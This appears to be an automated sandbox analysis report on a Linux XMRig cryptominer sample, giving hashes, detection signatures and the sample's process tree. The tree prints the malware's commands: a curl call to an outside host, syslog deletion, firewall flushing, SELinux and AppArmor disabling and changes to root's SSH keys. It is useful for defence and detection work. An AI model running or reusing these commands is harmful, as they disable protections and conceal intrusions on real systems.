xmrig_linux | 71b478d4ad418cfb6ec620ea213a3f5c6a64bd34f23d8f43de81df01465bcbad

Analysis

max time kernel
149s
max time network
131s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240226-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240226-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
07-03-2024 08:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b84ec8d2286ecb64f4164633be39421b
Size

60KB
MD5

b84ec8d2286ecb64f4164633be39421b
SHA1

7b09fb48eefb27acadf53aed331a24211ce78a72
SHA256

71b478d4ad418cfb6ec620ea213a3f5c6a64bd34f23d8f43de81df01465bcbad
SHA512

f31cbcf9b8a6e935f8ca8341aac462c059a1c08ddeba4986fbd7d2224917bdbaad21d1fb0dfb437b9385998c74e856c36387e7785018f4bea8cc4a217ce87844
SSDEEP

1536:/F2cc2/ndOQvL0KKGdAkKFOmm5air0TI9:/F2ccQh2v47ccyI9

Score

10^/10

xmrig_linux evasion miner persistence rootkit

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux

Changes its process name 2 IoCs

Processes:

description	ioc	pid
Changes the process name, possibly in an attempt to hide itself	(sysv-install)	1816
Changes the process name, possibly in an attempt to hide itself	(sysv-install)	3147

Deletes system logs 1 TTPs 1 IoCs

Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

evasion

Indicator Removal

T1070

Processes:

description	ioc	Process
File deleted	/var/log/syslog	rm

Executes dropped EXE 1 IoCs

Processes:

ioc	pid	Process
/usr/bin/tntrecht	3701

Flushes firewall rules 4 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

Processes:

ufwiptablesupdate-rc.d

pid	Process
3172
1584	ufw
1756	iptables
1840	update-rc.d

Loads a kernel module 1 IoCs

Loads a Linux kernel module, potentially to achieve persistence

rootkit

Processes:

modprobe

ioc	pid	Process
/lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko	1588	modprobe

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Dynamic Resolution

T1568

Processes:

b84ec8d2286ecb64f4164633be39421b

description	ioc	Process
File opened for modification	/etc/resolv.conf	b84ec8d2286ecb64f4164633be39421b

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

chattrxargsxargschattrxargschattrip6tablesgrepxargsxargsxargsxargschattrip6tablesxargschattrxargsip6tablesxargsxargsxargsip6tablesxargschattrchattriptableschattrxargsxargschattrchattrxargsxargsip6tablesxargsxargsip6tablesxargsxargsxargsxargschattrxargsxargschattrxargsxargschattrxargschattrxargsiptablesxargsxargsxargsxargsiptablesxargschattr

pid	Process
1583	chattr
2138	xargs
2345	xargs
3011	chattr
2520	xargs
3027	chattr
1715	ip6tables
1768	grep
2048	xargs
2068	xargs
2217	xargs
2280	xargs
3029	chattr
1678	ip6tables
2577	xargs
3015	chattr
3051	xargs
3627
1717	ip6tables
1984	xargs
2168	xargs
2473	xargs
1698	ip6tables
2320	xargs
3091
3013	chattr
3021	chattr
1604	iptables
1761	chattr
2153	xargs
2203	xargs
3003	chattr
3008	chattr
2497	xargs
2556	xargs
1718	ip6tables
1954	xargs
2222	xargs
1686	ip6tables
1930	xargs
2103	xargs
2208	xargs
2315	xargs
3018	chattr
2073	xargs
2485	xargs
3032	chattr
3067	xargs
3083	xargs
1582	chattr
2355	xargs
3031	chattr
3059	xargs
3095
1597	iptables
1936	xargs
2491	xargs
2586	xargs
3043	xargs
1603	iptables
2514	xargs
3023	chattr
3115
3629

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

Processes:

description	ioc	Process
File opened for modification	/etc/crontab

Disables AppArmor 64 IoCs

Disables AppArmor security module.

Processes:

systemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctl

pid	Process
3230
1891	systemctl
3225
3229
1770	systemctl
1819	systemctl
3650
1907	systemctl
3231
3232
1896	systemctl
3123
3130
3120
3173
1770	systemctl
1841	systemctl
1841	systemctl
1885	systemctl
3233
3150
3224
1770	systemctl
1770	systemctl
3120
3134
3139
3120
3150
1841	systemctl
1882	systemctl
3125
3146
1899	systemctl
3144
3222
1903	systemctl
3221
3235
1898	systemctl
1770	systemctl
1889	systemctl
1897	systemctl
3226
3237
1819	systemctl
3138
3173
3128
1841	systemctl
1882	systemctl
3127
3238
3214
1902	systemctl
3132
3142
1882	systemctl
3240
1890	systemctl
1900	systemctl
3150
1905	systemctl
3133

Disables SELinux 3 IoCs

Disables SELinux security module.

Processes:

setenforcegrepgrep

pid	Process
1769	setenforce
2181	grep
2293	grep

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

T1082

Processes:

pspspspspkillpkillpkillpspspspspkillpkillpkillpkillpspspspkillpkillpkillpkillpkillpspspspkillpspspspkillpkillpspspspspspkillpspspspspspkillpkillpspkillkillpspspspspspspspkillpkillpkillpkill

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill

Write file to user bin folder 1 TTPs 1 IoCs

Hijack Execution Flow

T1574

Processes:

description	ioc	Process
File opened for modification	/usr/bin/tntrecht

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

Processes:

modprobe

description	ioc	Process
File opened for reading	/sys/module/ip6_tables/initstate	modprobe
File opened for reading	/sys/module/x_tables/initstate	modprobe

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pspspspkillpspspspspspspspkillpspkillpspspspspspkillpspspspspspkillpspspspspkillpkillpkillpkillpspspkillpspspspspspspkillpkillpsps

description	ioc	Process
File opened for reading	/proc/352/cmdline	ps
File opened for reading	/proc/184/cmdline	ps
File opened for reading	/proc/sys/kernel/pid_max	ps
File opened for reading	/proc/1144/status	pkill
File opened for reading	/proc/1172/status	ps
File opened for reading	/proc/1232/cmdline	ps
File opened for reading	/proc/1140/cmdline	ps
File opened for reading	/proc/1286/stat	ps
File opened for reading	/proc/1209/status	ps
File opened for reading	/proc/1271/stat	ps
File opened for reading	/proc/1573/stat	ps
File opened for reading	/proc/115/status	ps
File opened for reading	/proc/217/status	pkill
File opened for reading	/proc/20/cmdline	ps
File opened for reading	/proc/453/stat	ps
File opened for reading	/proc/10/status	pkill
File opened for reading	/proc/189/stat	ps
File opened for reading	/proc/1140/stat	ps
File opened for reading	/proc/1090/stat	ps
File opened for reading	/proc/81/cmdline	ps
File opened for reading	/proc/490/stat	ps
File opened for reading	/proc/474/status	ps
File opened for reading	/proc/486/cmdline	pkill
File opened for reading	/proc/2057/stat	ps
File opened for reading	/proc/1563/cmdline	ps
File opened for reading	/proc/185/status	ps
File opened for reading	/proc/178/cmdline	ps
File opened for reading	/proc/528/cmdline	ps
File opened for reading	/proc/5/status	pkill
File opened for reading	/proc/29/stat
File opened for reading	/proc/1568/status
File opened for reading	/proc/1563/stat	ps
File opened for reading	/proc/1090/status	ps
File opened for reading	/proc/181/stat	ps
File opened for reading	/proc/79/status	ps
File opened for reading	/proc/22/cmdline	pkill
File opened for reading	/proc/180/cmdline	pkill
File opened for reading	/proc/1203/cmdline	pkill
File opened for reading	/proc/1144/cmdline	pkill
File opened for reading	/proc/1203/cmdline	ps
File opened for reading	/proc/480/stat	ps
File opened for reading	/proc/1449/status	ps
File opened for reading	/proc/82/cmdline	pkill
File opened for reading	/proc/1085/cmdline	pkill
File opened for reading	/proc/459/cmdline	ps
File opened for reading	/proc/947/status	ps
File opened for reading	/proc/729/status
File opened for reading	/proc/81/stat	ps
File opened for reading	/proc/173/cmdline	ps
File opened for reading	/proc/530/stat	ps
File opened for reading	/proc/84/status	ps
File opened for reading	/proc/974/status	ps
File opened for reading	/proc/1148/stat	ps
File opened for reading	/proc/78/status	ps
File opened for reading	/proc/456/stat	ps
File opened for reading	/proc/456/status	ps
File opened for reading	/proc/89/status	pkill
File opened for reading	/proc/959/cmdline	pkill
File opened for reading	/proc/648/status	pkill
File opened for reading	/proc/982/status
File opened for reading	/proc/1031/status	ps
File opened for reading	/proc/1179/stat	ps
File opened for reading	/proc/1156/status	ps
File opened for reading	/proc/meminfo	ps

Writes file to tmp directory 7 IoCs

Malware often drops required files in the /tmp directory.

Processes:

b84ec8d2286ecb64f4164633be39421b

description	ioc	Process
File opened for modification	/tmp/svcguard	b84ec8d2286ecb64f4164633be39421b
File opened for modification	/tmp/svcworkmanager	b84ec8d2286ecb64f4164633be39421b
File opened for modification	/tmp/svcupdates	b84ec8d2286ecb64f4164633be39421b
File opened for modification	/tmp/kdevtmpfsi	b84ec8d2286ecb64f4164633be39421b
File opened for modification	/tmp/redis2	b84ec8d2286ecb64f4164633be39421b
File opened for modification	/tmp/newsvc.sh	b84ec8d2286ecb64f4164633be39421b
File opened for modification	/tmp/svcupdate	b84ec8d2286ecb64f4164633be39421b

/tmp/b84ec8d2286ecb64f4164633be39421b
/tmp/b84ec8d2286ecb64f4164633be39421b
1⤵
- Writes DNS configuration
- Writes file to tmp directory
PID:1573
- /usr/bin/id
  id
  2⤵
  PID:1574
- /usr/bin/curl
  curl "http://oracle.zzhreceive.top/b2f628/idcheck/uid=0(root) gid=0(root) groups=0(root)"
  2⤵
  PID:1575
- /bin/mkdir
  mkdir /var/tmp/.system -p
  2⤵
  PID:1580
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  - Deletes system logs
  PID:1581
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  - Attempts to change immutable files
  PID:1582
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  - Attempts to change immutable files
  PID:1583
- /usr/sbin/ufw
  ufw disable
  2⤵
  - Flushes firewall rules
  PID:1584
- - /sbin/iptables
    /sbin/iptables -V
    3⤵
    PID:1585
- - /lib/ufw/ufw-init
    /lib/ufw/ufw-init force-stop
    3⤵
    PID:1586
  - - /sbin/ip6tables
      ip6tables -L INPUT -n
      4⤵
      PID:1587
    - - /sbin/modprobe
        
        /sbin/modprobe ip6_tables
        5⤵
        Loads a kernel module
        Enumerates kernel/hardware configuration
        
        PID:1588
  - - /sbin/iptables
      iptables -F ufw-logging-deny
      4⤵
      PID:1592
  - - /sbin/iptables
      iptables -F ufw-logging-allow
      4⤵
      PID:1595
  - - /sbin/iptables
      iptables -F ufw-not-local
      4⤵
      PID:1596
  - - /sbin/iptables
      iptables -F ufw-user-logging-input
      4⤵
      Attempts to change immutable files
      PID:1597
  - - /sbin/iptables
      iptables -F ufw-user-limit-accept
      4⤵
      PID:1598
  - - /sbin/iptables
      iptables -F ufw-user-limit
      4⤵
      PID:1599
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-input
      4⤵
      PID:1600
  - - /sbin/iptables
      iptables -F ufw-reject-input
      4⤵
      PID:1601
  - - /sbin/iptables
      iptables -F ufw-after-logging-input
      4⤵
      PID:1602
  - - /sbin/iptables
      iptables -F ufw-after-input
      4⤵
      Attempts to change immutable files
      PID:1603
  - - /sbin/iptables
      iptables -F ufw-user-input
      4⤵
      Attempts to change immutable files
      PID:1604
  - - /sbin/iptables
      iptables -F ufw-before-input
      4⤵
      PID:1605
  - - /sbin/iptables
      iptables -F ufw-before-logging-input
      4⤵
      PID:1606
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-forward
      4⤵
      PID:1607
  - - /sbin/iptables
      iptables -F ufw-reject-forward
      4⤵
      PID:1608
  - - /sbin/iptables
      iptables -F ufw-after-logging-forward
      4⤵
      PID:1609
  - - /sbin/iptables
      iptables -F ufw-after-forward
      4⤵
      PID:1610
  - - /sbin/iptables
      iptables -F ufw-user-logging-forward
      4⤵
      PID:1611
  - - /sbin/iptables
      iptables -F ufw-user-forward
      4⤵
      PID:1612
  - - /sbin/iptables
      iptables -F ufw-before-forward
      4⤵
      PID:1613
  - - /sbin/iptables
      iptables -F ufw-before-logging-forward
      4⤵
      PID:1614
  - - /sbin/iptables
      iptables -F ufw-track-forward
      4⤵
      PID:1615
  - - /sbin/iptables
      iptables -F ufw-track-output
      4⤵
      PID:1616
  - - /sbin/iptables
      iptables -F ufw-track-input
      4⤵
      PID:1617
  - - /sbin/iptables
      iptables -F ufw-skip-to-policy-output
      4⤵
      PID:1618
  - - /sbin/iptables
      iptables -F ufw-reject-output
      4⤵
      PID:1619
  - - /sbin/iptables
      iptables -F ufw-after-logging-output
      4⤵
      PID:1620
  - - /sbin/iptables
      iptables -F ufw-after-output
      4⤵
      PID:1621
  - - /sbin/iptables
      iptables -F ufw-user-logging-output
      4⤵
      PID:1622
  - - /sbin/iptables
      iptables -F ufw-user-output
      4⤵
      PID:1623
  - - /sbin/iptables
      iptables -F ufw-before-output
      4⤵
      PID:1624
  - - /sbin/iptables
      iptables -F ufw-before-logging-output
      4⤵
      PID:1625
  - - /sbin/iptables
      iptables -Z ufw-logging-deny
      4⤵
      PID:1626
  - - /sbin/iptables
      iptables -Z ufw-logging-allow
      4⤵
      PID:1627
  - - /sbin/iptables
      iptables -Z ufw-not-local
      4⤵
      PID:1628
  - - /sbin/iptables
      iptables -Z ufw-user-logging-input
      4⤵
      PID:1629
  - - /sbin/iptables
      iptables -Z ufw-user-limit-accept
      4⤵
      PID:1630
  - - /sbin/iptables
      iptables -Z ufw-user-limit
      4⤵
      PID:1631
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-input
      4⤵
      PID:1632
  - - /sbin/iptables
      iptables -Z ufw-reject-input
      4⤵
      PID:1633
  - - /sbin/iptables
      iptables -Z ufw-after-logging-input
      4⤵
      PID:1634
  - - /sbin/iptables
      iptables -Z ufw-after-input
      4⤵
      PID:1635
  - - /sbin/iptables
      iptables -Z ufw-user-input
      4⤵
      PID:1636
  - - /sbin/iptables
      iptables -Z ufw-before-input
      4⤵
      PID:1637
  - - /sbin/iptables
      iptables -Z ufw-before-logging-input
      4⤵
      PID:1638
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-forward
      4⤵
      PID:1639
  - - /sbin/iptables
      iptables -Z ufw-reject-forward
      4⤵
      PID:1640
  - - /sbin/iptables
      iptables -Z ufw-after-logging-forward
      4⤵
      PID:1641
  - - /sbin/iptables
      iptables -Z ufw-after-forward
      4⤵
      PID:1642
  - - /sbin/iptables
      iptables -Z ufw-user-logging-forward
      4⤵
      PID:1643
  - - /sbin/iptables
      iptables -Z ufw-user-forward
      4⤵
      PID:1644
  - - /sbin/iptables
      iptables -Z ufw-before-forward
      4⤵
      PID:1645
  - - /sbin/iptables
      iptables -Z ufw-before-logging-forward
      4⤵
      PID:1646
  - - /sbin/iptables
      iptables -Z ufw-track-forward
      4⤵
      PID:1647
  - - /sbin/iptables
      iptables -Z ufw-track-output
      4⤵
      PID:1648
  - - /sbin/iptables
      iptables -Z ufw-track-input
      4⤵
      PID:1649
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-output
      4⤵
      PID:1650
  - - /sbin/iptables
      iptables -Z ufw-reject-output
      4⤵
      PID:1651
  - - /sbin/iptables
      iptables -Z ufw-after-logging-output
      4⤵
      PID:1652
  - - /sbin/iptables
      iptables -Z ufw-after-output
      4⤵
      PID:1653
  - - /sbin/iptables
      iptables -Z ufw-user-logging-output
      4⤵
      PID:1654
  - - /sbin/iptables
      iptables -Z ufw-user-output
      4⤵
      PID:1655
  - - /sbin/iptables
      iptables -Z ufw-before-output
      4⤵
      PID:1656
  - - /sbin/iptables
      iptables -Z ufw-before-logging-output
      4⤵
      PID:1657
  - - /sbin/iptables
      iptables -X ufw-logging-deny
      4⤵
      PID:1658
  - - /sbin/iptables
      iptables -X ufw-logging-allow
      4⤵
      PID:1659
  - - /sbin/iptables
      iptables -X ufw-not-local
      4⤵
      PID:1660
  - - /sbin/iptables
      iptables -X ufw-user-logging-input
      4⤵
      PID:1661
  - - /sbin/iptables
      iptables -X ufw-user-logging-output
      4⤵
      PID:1662
  - - /sbin/iptables
      iptables -X ufw-user-logging-forward
      4⤵
      PID:1663
  - - /sbin/iptables
      iptables -X ufw-user-limit-accept
      4⤵
      PID:1664
  - - /sbin/iptables
      iptables -X ufw-user-limit
      4⤵
      PID:1665
  - - /sbin/iptables
      iptables -X ufw-user-input
      4⤵
      PID:1666
  - - /sbin/iptables
      iptables -X ufw-user-forward
      4⤵
      PID:1667
  - - /sbin/iptables
      iptables -X ufw-user-output
      4⤵
      PID:1668
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-input
      4⤵
      PID:1669
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-output
      4⤵
      PID:1670
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-forward
      4⤵
      PID:1671
  - - /sbin/iptables
      iptables -P INPUT ACCEPT
      4⤵
      PID:1672
  - - /sbin/iptables
      iptables -P OUTPUT ACCEPT
      4⤵
      PID:1673
  - - /sbin/iptables
      iptables -P FORWARD ACCEPT
      4⤵
      PID:1674
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-deny
      4⤵
      PID:1675
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-allow
      4⤵
      PID:1676
  - - /sbin/ip6tables
      ip6tables -F ufw6-not-local
      4⤵
      PID:1677
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-input
      4⤵
      Attempts to change immutable files
      PID:1678
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit-accept
      4⤵
      PID:1679
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit
      4⤵
      PID:1680
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-input
      4⤵
      PID:1681
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-input
      4⤵
      PID:1682
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-input
      4⤵
      PID:1683
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-input
      4⤵
      PID:1684
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-input
      4⤵
      PID:1685
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-input
      4⤵
      Attempts to change immutable files
      PID:1686
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-input
      4⤵
      PID:1687
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-forward
      4⤵
      PID:1688
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-forward
      4⤵
      PID:1689
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-forward
      4⤵
      PID:1690
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-forward
      4⤵
      PID:1691
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-forward
      4⤵
      PID:1692
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-forward
      4⤵
      PID:1693
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-forward
      4⤵
      PID:1694
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-forward
      4⤵
      PID:1695
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-forward
      4⤵
      PID:1696
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-output
      4⤵
      PID:1697
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-input
      4⤵
      Attempts to change immutable files
      PID:1698
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-output
      4⤵
      PID:1699
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-output
      4⤵
      PID:1700
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-output
      4⤵
      PID:1701
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-output
      4⤵
      PID:1702
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-output
      4⤵
      PID:1703
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-output
      4⤵
      PID:1704
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-output
      4⤵
      PID:1705
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-output
      4⤵
      PID:1706
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-deny
      4⤵
      PID:1707
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-allow
      4⤵
      PID:1708
  - - /sbin/ip6tables
      ip6tables -Z ufw6-not-local
      4⤵
      PID:1709
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-input
      4⤵
      PID:1710
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit-accept
      4⤵
      PID:1711
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit
      4⤵
      PID:1712
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-input
      4⤵
      PID:1713
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-input
      4⤵
      PID:1714
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-input
      4⤵
      Attempts to change immutable files
      PID:1715
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-input
      4⤵
      PID:1716
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-input
      4⤵
      Attempts to change immutable files
      PID:1717
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-input
      4⤵
      Attempts to change immutable files
      PID:1718
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-input
      4⤵
      PID:1719
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-forward
      4⤵
      PID:1720
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-forward
      4⤵
      PID:1721
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-forward
      4⤵
      PID:1722
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-forward
      4⤵
      PID:1723
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-forward
      4⤵
      PID:1724
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-forward
      4⤵
      PID:1725
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-forward
      4⤵
      PID:1726
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-forward
      4⤵
      PID:1727
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-forward
      4⤵
      PID:1728
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-output
      4⤵
      PID:1729
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-input
      4⤵
      PID:1730
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-output
      4⤵
      PID:1731
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-output
      4⤵
      PID:1732
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-output
      4⤵
      PID:1733
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-output
      4⤵
      PID:1734
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-output
      4⤵
      PID:1735
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-output
      4⤵
      PID:1736
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-output
      4⤵
      PID:1737
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-output
      4⤵
      PID:1738
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-deny
      4⤵
      PID:1739
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-allow
      4⤵
      PID:1740
  - - /sbin/ip6tables
      ip6tables -X ufw6-not-local
      4⤵
      PID:1741
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-input
      4⤵
      PID:1742
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-output
      4⤵
      PID:1743
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-forward
      4⤵
      PID:1744
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit-accept
      4⤵
      PID:1745
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit
      4⤵
      PID:1746
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-input
      4⤵
      PID:1747
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-forward
      4⤵
      PID:1748
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-output
      4⤵
      PID:1749
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-input
      4⤵
      PID:1750
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-output
      4⤵
      PID:1751
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-forward
      4⤵
      PID:1752
  - - /sbin/ip6tables
      ip6tables -P INPUT ACCEPT
      4⤵
      PID:1753
  - - /sbin/ip6tables
      ip6tables -P OUTPUT ACCEPT
      4⤵
      PID:1754
  - - /sbin/ip6tables
      ip6tables -P FORWARD ACCEPT
      4⤵
      PID:1755
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:1756
- /usr/bin/sudo
  sudo sysctl "kernel.nmi_watchdog=0"
  2⤵
  PID:1757
- - /sbin/sysctl
    sysctl "kernel.nmi_watchdog=0"
    3⤵
    PID:1758
- /sbin/sysctl
  sysctl "kernel.nmi_watchdog=0"
  2⤵
  PID:1759
- /usr/bin/chattr
  chattr -iae /root/.ssh/
  2⤵
  PID:1760
- /usr/bin/chattr
  chattr -iae /root/.ssh/authorized_keys
  2⤵
  - Attempts to change immutable files
  PID:1761
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:1762
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:1763
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:1764
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  PID:1766
- /bin/ps
  ps aux
  2⤵
  PID:1765
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  - Attempts to change immutable files
  PID:1768
- /bin/ps
  ps aux
  2⤵
  PID:1767
- /usr/sbin/setenforce
  setenforce 0
  2⤵
  - Disables SELinux
  PID:1769
- /usr/sbin/service
  service apparmor stop
  2⤵
  PID:1770
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:1771
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:1772
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    PID:1773
- - /bin/systemctl
    systemctl -p Triggers show acpid.socket
    3⤵
    PID:1785
- - /bin/systemctl
    systemctl -p Triggers show apport-forward.socket
    3⤵
    PID:1786
- - /bin/systemctl
